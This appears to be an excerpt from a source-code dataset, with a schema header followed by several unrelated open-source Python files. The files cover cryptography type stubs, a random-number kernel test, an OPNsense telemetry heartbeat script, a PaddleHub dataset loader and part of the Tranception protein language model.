blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c8317dc01c7102faf412e5cac970595d6932983b
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stubs/cryptography/cryptography/hazmat/primitives/ciphers/modes.pyi
|
b99d7a89fc924cd0b35a79a678468ddff4710abe
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 3,067
|
pyi
|
modes.pyi
|
from abc import ABCMeta, abstractmethod
from cryptography.hazmat.primitives.ciphers import CipherAlgorithm
class Mode(metaclass=ABCMeta):
@property
@abstractmethod
def name(self) -> str: ...
@abstractmethod
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class ModeWithAuthenticationTag(metaclass=ABCMeta):
@property
@abstractmethod
def tag(self) -> bytes: ...
class ModeWithInitializationVector(metaclass=ABCMeta):
@property
@abstractmethod
def initialization_vector(self) -> bytes: ...
class ModeWithNonce(metaclass=ABCMeta):
@property
@abstractmethod
def nonce(self) -> bytes: ...
class ModeWithTweak(metaclass=ABCMeta):
@property
@abstractmethod
def tweak(self) -> bytes: ...
class CBC(Mode, ModeWithInitializationVector):
def __init__(self, initialization_vector: bytes) -> None: ...
@property
def initialization_vector(self) -> bytes: ...
@property
def name(self) -> str: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class CTR(Mode, ModeWithNonce):
def __init__(self, nonce: bytes) -> None: ...
@property
def name(self) -> str: ...
@property
def nonce(self) -> bytes: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class CFB(Mode, ModeWithInitializationVector):
def __init__(self, initialization_vector: bytes) -> None: ...
@property
def initialization_vector(self) -> bytes: ...
@property
def name(self) -> str: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class CFB8(Mode, ModeWithInitializationVector):
def __init__(self, initialization_vector: bytes) -> None: ...
@property
def initialization_vector(self) -> bytes: ...
@property
def name(self) -> str: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class ECB(Mode):
@property
def name(self) -> str: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class GCM(Mode, ModeWithInitializationVector, ModeWithAuthenticationTag):
def __init__(self, initialization_vector: bytes, tag: bytes | None = ..., min_tag_length: int | None = ...) -> None: ...
@property
def initialization_vector(self) -> bytes: ...
@property
def name(self) -> str: ...
@property
def tag(self) -> bytes: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class OFB(Mode, ModeWithInitializationVector):
def __init__(self, initialization_vector: bytes) -> None: ...
@property
def initialization_vector(self) -> bytes: ...
@property
def name(self) -> str: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
class XTS(Mode, ModeWithTweak):
def __init__(self, tweak: bytes) -> None: ...
@property
def name(self) -> str: ...
@property
def tweak(self) -> bytes: ...
def validate_for_algorithm(self, algorithm: CipherAlgorithm) -> None: ...
|
46a324a4a1e6c8faf62db4ddc2e61a3ecfea0a40
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/miniclient/vehicle_compare/pointcuts.py
|
a86fc354c83a4d82967e205be94ed138432a290b
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 414
|
py
|
pointcuts.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/miniclient/vehicle_compare/pointcuts.py
import aspects
from helpers import aop
class MakeVehicleCompareUnavailable(aop.Pointcut):
def __init__(self):
aop.Pointcut.__init__(self, 'gui.game_control.veh_comparison_basket', 'VehComparisonBasket', 'isAvailable', aspects=(aspects.MakeVehicleCompareUnavailable,))
|
758e6abc8926b400146f8b70d52975fbd6af380d
|
4fab2df0ca38e25f0dd88b23e386c6f76206c02e
|
/warp_maniskill/warp/tests/test_rand.py
|
13a7c36e9df7a7cb793cd19c625ba42215bed20f
|
[
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"CC-BY-NC-4.0"
] |
permissive
|
haosulab/ManiSkill2
|
96ea208e36a6f8bdd93ad20fdf57263539f7ea00
|
43546c3341be9e11f369dee1b80c1b201c9cd6ae
|
refs/heads/main
| 2023-08-18T01:15:44.557502
| 2023-08-17T16:37:37
| 2023-08-17T16:37:37
| 520,357,130
| 259
| 42
|
Apache-2.0
| 2023-09-07T18:54:42
| 2022-08-02T04:56:58
|
Python
|
UTF-8
|
Python
| false
| false
| 3,028
|
py
|
test_rand.py
|
# Copyright (c) 2022 NVIDIA CORPORATION. All rights reserved.
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
import numpy as np
import warp as wp
from warp.tests.test_base import *
wp.init()
@wp.kernel
def test_kernel(
kernel_seed: int,
int_a: wp.array(dtype=int),
int_ab: wp.array(dtype=int),
float_01: wp.array(dtype=float),
float_ab: wp.array(dtype=float)):
tid = wp.tid()
state = wp.rand_init(kernel_seed, tid)
int_a[tid] = wp.randi(state)
int_ab[tid] = wp.randi(state, 0, 100)
float_01[tid] = wp.randf(state)
float_ab[tid] = wp.randf(state, 0.0, 100.0)
def test_rand(test, device):
N = 10
int_a_device = wp.zeros(N, dtype=int, device=device)
int_a_host = wp.zeros(N, dtype=int, device="cpu")
int_ab_device = wp.zeros(N, dtype=int, device=device)
int_ab_host = wp.zeros(N, dtype=int, device="cpu")
float_01_device = wp.zeros(N, dtype=float, device=device)
float_01_host = wp.zeros(N, dtype=float, device="cpu")
float_ab_device = wp.zeros(N, dtype=float, device=device)
float_ab_host = wp.zeros(N, dtype=float, device="cpu")
seed = 42
wp.launch(
kernel=test_kernel,
dim=N,
inputs=[seed, int_a_device, int_ab_device, float_01_device, float_ab_device],
outputs=[],
device=device
)
wp.copy(int_a_host, int_a_device)
wp.copy(int_ab_host, int_ab_device)
wp.copy(float_01_host, float_01_device)
wp.copy(float_ab_host, float_ab_device)
wp.synchronize()
int_a = int_a_host.numpy()
int_ab = int_ab_host.numpy()
float_01 = float_01_host.numpy()
float_ab = float_ab_host.numpy()
int_a_true = np.array([-575632308, 59537738, 1898992239, 442961864, -1069147335, -478445524, 1803659809, 2122909397, -1888556360, 334603718])
int_ab_true = np.array([46, 58, 46, 83, 85, 39, 72, 99, 18, 41])
float_01_true = np.array([0.72961855, 0.86200964, 0.28770837, 0.8187722, 0.186335, 0.6101239, 0.56432086, 0.70428324, 0.64812654, 0.27679986])
float_ab_true = np.array([96.04259, 73.33809, 63.601555, 38.647305, 71.813896, 64.65809, 77.79791, 46.579605, 94.614456, 91.921814])
test.assertTrue((int_a == int_a_true).all())
test.assertTrue((int_ab == int_ab_true).all())
err = np.max(np.abs(float_01 - float_01_true))
test.assertTrue(err < 1e-04)
err = np.max(np.abs(float_ab - float_ab_true))
test.assertTrue(err < 1e-04)
def register(parent):
devices = wp.get_devices()
class TestNoise(parent):
pass
add_function_test(TestNoise, "test_rand", test_rand, devices=devices)
return TestNoise
if __name__ == '__main__':
c = register(unittest.TestCase)
unittest.main(verbosity=2)
|
03bef0d778e59c74918ea6f3952cfb24b073b6e9
|
3b79167a9d0b756aa5809bc4938d662ac0387958
|
/ann_benchmarks/constants.py
|
03b3c4a2b41a6a65b03cd0e1f4db8fc290c04055
|
[
"MIT"
] |
permissive
|
erikbern/ann-benchmarks
|
09708cbe9db498dae3bb9d03c8a36ffd2cd213c6
|
fa9b8fcea27dd277dcbee240ffd763e9aac93299
|
refs/heads/main
| 2023-08-29T22:40:24.454703
| 2023-08-23T18:32:44
| 2023-08-23T18:32:44
| 36,439,741
| 4,036
| 677
|
MIT
| 2023-08-31T22:41:51
| 2015-05-28T13:21:43
|
Python
|
UTF-8
|
Python
| false
| false
| 22
|
py
|
constants.py
|
INDEX_DIR = "indices"
|
d293f5dccf755161523881b54894369b57c5cf12
|
8cd504360c1eefa2412a5a8f1fb1e02c06ae2877
|
/security/etpro-telemetry/src/opnsense/scripts/etpro_telemetry/send_heartbeat.py
|
c4805b1e0d122745ef26401500872f467bc10baa
|
[
"LicenseRef-scancode-proprietary-license",
"BSD-2-Clause"
] |
permissive
|
opnsense/plugins
|
71b041fc9b47d627f1b70fc84d23b06779e8ae76
|
37ea19d9130ffcf1ed462b52d729c23d3237fd52
|
refs/heads/master
| 2023-09-01T09:04:48.918688
| 2023-09-01T07:00:49
| 2023-09-01T07:01:23
| 38,818,223
| 790
| 905
|
BSD-2-Clause
| 2023-09-09T15:49:06
| 2015-07-09T12:13:51
|
PHP
|
UTF-8
|
Python
| false
| false
| 3,788
|
py
|
send_heartbeat.py
|
#!/usr/local/bin/python3
"""
Copyright (c) 2018-2019 Ad Schellevis <ad@opnsense.org>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import sys
import argparse
import requests
import syslog
import time
import random
import urllib3
import json
import telemetry
import telemetry.system
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--endpoint',
help='Endpoint url to reach',
default="%s/api/v1/telemetry" % telemetry.BASE_URL)
parser.add_argument('-i', '--insecure',
help='Insecure, skip certificate validation',
action="store_true",
default=False)
parser.add_argument('-c', '--config',
help='rule downloader configuration',
default="/usr/local/etc/suricata/rule-updater.config"
)
parser.add_argument('-D', '--direct',
help='do not sleep before send (disable traffic spread)',
action="store_true",
default=False)
parser.add_argument('-t', '--test',
help='test mode, output request/response to stdout',
action="store_true",
default=False)
args = parser.parse_args()
exit_code = -1
cnf = telemetry.get_config(args.config)
if cnf.token is not None:
params = {'timeout': 5, 'headers': {'Authorization': 'Bearer %s' % cnf.token}}
if args.insecure:
params['verify'] = False
try:
# spread traffic to remote host, usual cron interval is 30 minutes
if not args.direct and not args.test:
time.sleep(random.randint(0, 1800))
params['json'] = telemetry.system.Stats().get()
if args.test:
print("push to \t%s " % args.endpoint)
print("payload : \t%s" % json.dumps(params['json']))
r = requests.post(args.endpoint, **params)
if args.test:
print("response %d : \t%s " % (r.status_code, r.text))
if r.status_code == 201:
# expected result, set exit code
exit_code = 0
else:
syslog.syslog(syslog.LOG_ERR, 'unexpected result from %s (http_code %s)' % (args.endpoint, r.status_code))
except requests.exceptions.ConnectionError:
syslog.syslog(syslog.LOG_ERR, 'connection error sending heartbeat to %s' % args.endpoint)
else:
syslog.syslog(syslog.LOG_ERR, 'telemetry token missing in %s' % args.config)
# exit
sys.exit(exit_code)
|
614db5b609de1c4d2c8aac85a16730f5a0146263
|
5095200e9ca55cd3a37af34ed44448c02e2a1bb5
|
/paddlehub/datasets/canvas.py
|
22e1aefe520812a3d01b9b0cc47d94659af88fd1
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleHub
|
8712603ef486c45e83eb0bc5725b0b3ed3ddbbde
|
b402610a6f0b382a978e82473b541ea1fc6cf09a
|
refs/heads/develop
| 2023-07-24T06:03:13.172978
| 2023-03-28T11:49:55
| 2023-03-28T11:49:55
| 162,672,577
| 12,914
| 2,239
|
Apache-2.0
| 2023-07-06T21:38:19
| 2018-12-21T06:00:48
|
Python
|
UTF-8
|
Python
| false
| false
| 1,938
|
py
|
canvas.py
|
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import Callable
import paddle
import numpy as np
import paddlehub.env as hubenv
from paddlehub.vision.utils import get_img_file
from paddlehub.utils.download import download_data
@download_data(url='https://paddlehub.bj.bcebos.com/dygraph/datasets/canvas.tar.gz')
class Canvas(paddle.io.Dataset):
"""
Dataset for colorization. It contains 1193 and 400 pictures for Monet and Vango paintings style, respectively.
We collected data from https://people.eecs.berkeley.edu/~taesung_park/CycleGAN/datasets/.
Args:
transform(callmethod) : The method of preprocess images.
mode(str): The mode for preparing dataset.
Returns:
DataSet: An iterable object for data iterating
"""
def __init__(self, transform: Callable, mode: str = 'train'):
self.mode = mode
self.transform = transform
if self.mode == 'train':
self.file = 'train'
elif self.mode == 'test':
self.file = 'test'
self.file = os.path.join(hubenv.DATA_HOME, 'canvas', self.file)
self.data = get_img_file(self.file)
def __getitem__(self, idx: int) -> np.ndarray:
img_path = self.data[idx]
im = self.transform(img_path)
return im
def __len__(self):
return len(self.data)
|
1bb8ea7db3485c2d3ef7e9b2590d25a2ef949aef
|
cc127478f47a3af9d9ac3d4418cd2643ed510ded
|
/tests/test_server_sanity.py
|
2bbb7665d07de3ca580ea1c090c41631a5c594bd
|
[
"BSD-2-Clause",
"Apache-2.0"
] |
permissive
|
IntelLabs/nlp-architect
|
3830c8e778081246b6b04b8462b30f44f66d70fb
|
88b323678642d046415768ef7764523003000ed7
|
refs/heads/master
| 2023-09-03T21:02:10.518747
| 2022-11-07T16:21:47
| 2022-11-07T16:21:47
| 133,867,923
| 459
| 85
|
Apache-2.0
| 2022-11-07T15:30:53
| 2018-05-17T21:00:13
|
Python
|
UTF-8
|
Python
| false
| false
| 7,507
|
py
|
test_server_sanity.py
|
# # ******************************************************************************
# # Copyright 2017-2018 Intel Corporation
# #
# # Licensed under the Apache License, Version 2.0 (the "License");
# # you may not use this file except in compliance with the License.
# # You may obtain a copy of the License at
# #
# # http://www.apache.org/licenses/LICENSE-2.0
# #
# # Unless required by applicable law or agreed to in writing, software
# # distributed under the License is distributed on an "AS IS" BASIS,
# # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# # See the License for the specific language governing permissions and
# # limitations under the License.
# # ******************************************************************************
# # pylint: disable=redefined-outer-name
# # pylint: disable=c-extension-no-member
# import gzip
# import io
# import json
# import os
# import sys
# from io import open
# from os.path import dirname
# import hug
# import pytest
# import nlp_architect.server.serve
# from nlp_architect.server.serve import api
# from nlp_architect.utils.text import try_to_load_spacy
# if not try_to_load_spacy('en'):
# pytest.skip("\n\nSkipping test_server_sanity.py. Reason: 'spacy en' model not installed. "
# "Please see https://spacy.io/models/ for installation instructions.\n"
# "The terms and conditions of the data set and/or model license apply.\n"
# "Intel does not grant any rights to the data and/or model files.\n",
# allow_module_level=True)
# sys.path.insert(0, (dirname(dirname(os.path.abspath(__file__)))))
# headers = {"clean": "True", "display_post_preprocces": "True",
# "display_tokens": "", "display_token_text": "True",
# "IS-HTML": "False"}
# server_data_rel_path = 'fixtures/data/server/'
# def load_test_data(service_name):
# """
# load test data (input and expected response) for given service from 'tests_data.json'
# Args:
# service_name (str): the service name
# Returns:
# str: the test data of the service
# """
# with open(os.path.join(os.path.dirname(__file__), server_data_rel_path + 'tests_data.json'),
# 'r') as f:
# service_test_data = json.loads(f.read())[service_name]
# return service_test_data
# def assert_response_struct(result_doc, expected_result):
# # 1. assert docs list
# assert isinstance(result_doc, list)
# assert len(result_doc) == len(expected_result)
# # 2. assert the structure of doc item
# result_item = result_doc[0]
# expected_result_item = expected_result[0]
# assert isinstance(result_item, dict)
# for key in expected_result_item.keys():
# assert key in result_item
# # 3. assert the structure of doc item dict
# result_dict = result_item['doc']
# expected_result_dict = expected_result_item['doc']
# if isinstance(result_dict, list):
# result_dict = result_dict[0]
# expected_result_dict = expected_result_dict[0]
# assert isinstance(result_dict, dict)
# for key in expected_result_dict.keys():
# assert key in result_dict
# # 4. check CoreNLPDoc
# if 'sentences' in expected_result_dict.keys():
# assert isinstance(result_dict['sentences'], list)
# # assert sentence:
# assert isinstance(result_dict['sentences'][0], list)
# # assert word-token
# result_word_dict = result_dict['sentences'][0][0]
# expected_result_word_dict = expected_result_item['sentences'][0][0]
# for key in expected_result_word_dict.keys():
# assert key in result_word_dict
# # 5. check HighLevelDoc
# elif 'annotation_set' in expected_result_dict.keys():
# assert isinstance(result_dict['annotation_set'], list)
# assert isinstance(result_dict['spans'], list)
# result_spans = result_dict['spans'][0]
# expected_result_spans = expected_result_dict['spans'][0]
# assert isinstance(result_spans, dict)
# for key in expected_result_spans.keys():
# assert key in result_spans
# # 6. check displacy html rendering input
# elif 'arcs' in expected_result_dict.keys():
# assert isinstance(result_dict['arcs'], list)
# assert isinstance(result_dict['words'], list)
# result_arcs = result_dict['arcs'][0]
# expected_result_arcs = expected_result_dict['arcs'][0]
# assert isinstance(result_arcs, dict)
# for key in expected_result_arcs.keys():
# assert key in result_arcs
# result_words = result_dict['words'][0]
# expected_result_words = expected_result_dict['words'][0]
# assert isinstance(result_words, dict)
# for key in expected_result_words.keys():
# assert key in result_words
# @pytest.mark.parametrize('service_name', ['bist', 'ner'])
# def test_request(service_name):
# test_data = load_test_data(service_name)
# test_data['input']['model_name'] = service_name
# doc = json.dumps(test_data["input"])
# expected_result = json.dumps(test_data["response"])
# myHeaders = headers.copy()
# myHeaders["content-type"] = "application/json"
# myHeaders["Response-Format"] = "json"
# # pylint: disable=no-member
# response = hug.test.post(api, '/inference', body=doc, headers=myHeaders)
# assert_response_struct(response.data, json.loads(expected_result))
# assert response.status == hug.HTTP_OK
# @pytest.mark.parametrize('service_name', ['bist', 'ner'])
# def test_gzip_file_request(service_name):
# file_path = os.path.join(os.path.dirname(__file__), server_data_rel_path + service_name
# + "_sentences_examples.json.gz")
# with open(file_path, 'rb') as file_data:
# doc = file_data.read()
# expected_result = json.dumps(load_test_data(service_name)["response"])
# myHeaders = headers.copy()
# myHeaders["content-type"] = "application/gzip"
# myHeaders["Response-Format"] = "gzip"
# myHeaders["content-encoding"] = "gzip"
# # pylint: disable=no-member
# response = hug.test.post(api, '/inference', body=doc, headers=myHeaders)
# result_doc = get_decompressed_gzip(response.data)
# assert_response_struct(result_doc, json.loads(expected_result))
# assert response.status == hug.HTTP_OK
# @pytest.mark.parametrize('service_name', ['bist', 'ner'])
# def test_json_file_request(service_name):
# file_path = os.path.join(os.path.dirname(__file__), server_data_rel_path + service_name
# + "_sentences_examples.json")
# with open(file_path, 'rb') as file:
# doc = file.read()
# expected_result = json.dumps(load_test_data(service_name)["response"])
# myHeaders = headers.copy()
# myHeaders["Content-Type"] = "application/json"
# myHeaders["RESPONSE-FORMAT"] = "json"
# # pylint: disable=no-member
# response = hug.test.post(nlp_architect.server.serve, '/inference', body=doc, headers=myHeaders)
# assert_response_struct(response.data, json.loads(expected_result))
# assert response.status == hug.HTTP_OK
# def get_decompressed_gzip(req_resp):
# tmp_file = io.BytesIO()
# tmp_file.write(req_resp)
# tmp_file.seek(0)
# with gzip.GzipFile(fileobj=tmp_file, mode='rb') as file_out:
# gunzipped_bytes_obj = file_out.read()
# return json.loads(gunzipped_bytes_obj.decode())
|
b0a4ca9c42b5ae0ba53e5349cf7dd7af54ddc54b
|
27ac9607f178d74441eb11a0b73d3e9b9a799626
|
/tranception/model_pytorch.py
|
954244c96a4d918801d4b78e6e9cde81d7249f6b
|
[
"MIT"
] |
permissive
|
OATML-Markslab/Tranception
|
044530d3c5128c8a9430683669bce43ea2cdefdf
|
2ddf40e1db9d2d180d1b5fc9d1b39ad5b04fbb6d
|
refs/heads/main
| 2023-08-19T06:06:46.117947
| 2023-07-20T10:39:47
| 2023-07-20T10:39:47
| 495,165,462
| 101
| 27
|
MIT
| 2023-08-15T15:38:37
| 2022-05-22T20:06:11
|
Python
|
UTF-8
|
Python
| false
| false
| 45,439
|
py
|
model_pytorch.py
|
from dataclasses import dataclass
from typing import Optional, Tuple
import math
import os
import pandas as pd
import torch
from torch import nn
from torch.nn import CrossEntropyLoss, NLLLoss
import torch.nn.functional as F
from transformers import GPT2PreTrainedModel
from transformers.modeling_utils import (
Conv1D,
PreTrainedModel,
SequenceSummary,
find_pruneable_heads_and_indices,
prune_conv1d_layer,
)
from transformers.file_utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings
)
from transformers.modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
SequenceClassifierOutputWithPast,
TokenClassifierOutput
)
from transformers.utils.model_parallel_utils import assert_device_map, get_device_map
from tranception.activations import tranception_ACT2FN
from tranception.config import TranceptionConfig
from tranception.outputs import (
TranceptionCausalLMOutputWithCrossAttentions,
)
from tranception.utils import msa_utils
from tranception.utils import scoring_utils
def nanmean(v, *args, inplace=False, **kwargs):
if not inplace:
v = v.clone()
is_nan = torch.isnan(v)
v[is_nan] = 0
return v.sum(*args, **kwargs) / (~is_nan).float().sum(*args, **kwargs)
def get_slopes(n, mode="standard_alibi", verbose=False):
"""
Function to compute the m constant for each attention head. Code has been adapted from the official ALiBi codebase at:
https://github.com/ofirpress/attention_with_linear_biases/blob/master/fairseq/models/transformer.py
"""
def get_slopes_power_of_2(n):
start = (2**(-2**-(math.log2(n)-3)))
ratio = start
return [start*ratio**i for i in range(n)]
if mode=="grouped_alibi":
n = n // 4
if math.log2(n).is_integer():
result = get_slopes_power_of_2(n)
else:
#Workaround when the number of heads is not a power of 2
closest_power_of_2 = 2**math.floor(math.log2(n))
result = get_slopes_power_of_2(closest_power_of_2) + get_slopes(2*closest_power_of_2)[0::2][:n-closest_power_of_2]
if mode=="grouped_alibi":
result = result * 4
if verbose:
print("ALiBi slopes: {}".format(result))
return result
class SpatialDepthWiseConvolution(nn.Module):
def __init__(self, head_dim: int, kernel_size: int = 3):
super().__init__()
self.kernel_size = kernel_size
self.conv = nn.Conv1d(in_channels=head_dim, out_channels=head_dim, kernel_size=(kernel_size,), padding=(kernel_size - 1,), groups=head_dim)
def forward(self, x: torch.Tensor):
batch_size, heads, seq_len, head_dim = x.shape
x = x.permute(0, 1, 3, 2).contiguous()
x = x.view(batch_size * heads, head_dim, seq_len)
x = self.conv(x)
if self.kernel_size>1:
x = x[:, :, :-(self.kernel_size - 1)]
x = x.view(batch_size, heads, head_dim, seq_len)
x = x.permute(0, 1, 3, 2)
return x
class TranceptionBlockAttention(nn.Module):
def __init__(self, config, is_cross_attention=False, SDWC_kernel_size=None):
super().__init__()
max_positions = config.max_position_embeddings
self.register_buffer(
"bias",
torch.tril(torch.ones((max_positions, max_positions), dtype=torch.uint8)).view(
1, 1, max_positions, max_positions
),
)
self.register_buffer("masked_bias", torch.tensor(-1e4))
self.embed_dim = config.hidden_size
self.num_heads = config.num_attention_heads
self.head_dim = self.embed_dim // self.num_heads
self.split_size = self.embed_dim
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"`embed_dim` must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {self.num_heads})."
)
self.scale_attn_weights = config.scale_attn_weights
self.is_cross_attention = is_cross_attention
if self.is_cross_attention:
self.c_attn = Conv1D(2 * self.embed_dim, self.embed_dim)
self.q_attn = Conv1D(self.embed_dim, self.embed_dim)
else:
self.c_attn = Conv1D(3 * self.embed_dim, self.embed_dim)
self.c_proj = Conv1D(self.embed_dim, self.embed_dim)
self.attn_dropout = nn.Dropout(config.attn_pdrop)
self.resid_dropout = nn.Dropout(config.resid_pdrop)
self.pruned_heads = set()
self.attention_mode=config.attention_mode
if self.attention_mode=="tranception":
assert self.num_heads%4==0, "Invalid number of heads. Tranception requires the number of heads to be a multiple of 4."
self.num_heads_per_kernel_size = self.num_heads // 4
self.query_depthwiseconv = nn.ModuleDict()
self.key_depthwiseconv = nn.ModuleDict()
self.value_depthwiseconv = nn.ModuleDict()
for kernel_idx, kernel in enumerate([3,5,7]):
self.query_depthwiseconv[str(kernel_idx)] = SpatialDepthWiseConvolution(self.head_dim,kernel)
self.key_depthwiseconv[str(kernel_idx)] = SpatialDepthWiseConvolution(self.head_dim,kernel)
self.value_depthwiseconv[str(kernel_idx)] = SpatialDepthWiseConvolution(self.head_dim,kernel)
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.num_heads, self.head_dim, self.pruned_heads)
index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
# Prune conv1d layers
self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
# Update hyper params
self.split_size = (self.split_size // self.num_heads) * (self.num_heads - len(heads))
self.num_heads = self.num_heads - len(heads)
self.pruned_heads = self.pruned_heads.union(heads)
def _attn(self, query, key, value, attention_mask=None, head_mask=None, alibi_bias=None):
attn_weights = torch.matmul(query, key.transpose(-1, -2))
if self.scale_attn_weights:
attn_weights = attn_weights / (float(value.size(-1)) ** 0.5)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
attn_weights = torch.where(causal_mask, attn_weights, self.masked_bias.to(attn_weights.dtype))
if alibi_bias is not None:
attn_weights = attn_weights + alibi_bias[:,:,:attn_weights.size(-1)]
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(*new_shape)
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
tensor = tensor.permute(0, 2, 1, 3).contiguous()
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
use_cache=False,
output_attentions=False,
alibi_bias=None,
):
if encoder_hidden_states is not None:
if not hasattr(self, "q_attn"):
raise ValueError(
"If class is used as cross attention, the weights `q_attn` have to be defined. "
"Please make sure to instantiate class with `GPT2Attention(..., is_cross_attention=True)`."
)
query = self.q_attn(hidden_states)
key, value = self.c_attn(encoder_hidden_states).split(self.split_size, dim=2)
attention_mask = encoder_attention_mask
else:
